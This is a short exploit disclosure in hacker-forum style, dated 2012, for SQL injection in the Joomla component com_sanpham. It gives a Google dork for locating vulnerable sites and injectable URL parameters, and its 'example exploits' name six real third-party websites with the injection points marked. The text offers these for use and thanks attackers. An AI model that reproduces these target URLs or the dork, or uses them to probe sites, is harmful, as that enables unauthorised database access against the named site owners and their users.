[ Joomla Component com_sanpham SQL Injection Vulnerability ]
#[~] Author : the_cyber_nuxbie
#[~] Home : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found : 20 January 2012 - 07:45 PM.
#[~] Tested On : Windows 7 Ultimate.
#[~] Google Dork : inurl:"/index.php?option=com_sanpham"
[x] exploits:
http://localhost/index.php?option=com_sanpham&view=sanpham&kindid=[SQLi]
http://localhost/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=[SQLi]
http://localhost/index.php?option=com_sanpham&view=product&modelsid=[SQLi]
http://localhost/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi]
- Example Exploits:
http://one-designer.com/index.php?option=com_sanpham&view=sanpham&kindid=1' [SQLi]
http://chickyclub.asia/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=139' [SQLi]
http://chickyclub.asia/index.php?option=com_sanpham&view=product&modelsid=4' [SQLi]
http://mtcauto.com.vn/index.php?option=com_sanpham&view=product&markid=1&modelsid=2' [SQLi]
http://goby.vn/index.php?option=com_sanpham&view=product&task=detail&modelsid=6&cid=185' [SQLi]
http://vppanbinh.com.vn/index.php?option=com_sanpham&view=product&task=detail&modelsid=3&cid=46' [SQLi]
- N0T35:
0day no more...
"n0 d0rk f0r kiddi0t"
Thanks To:
All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc...
- 20 January 2012, GMT +07:35, IT-Underground, Indonesia.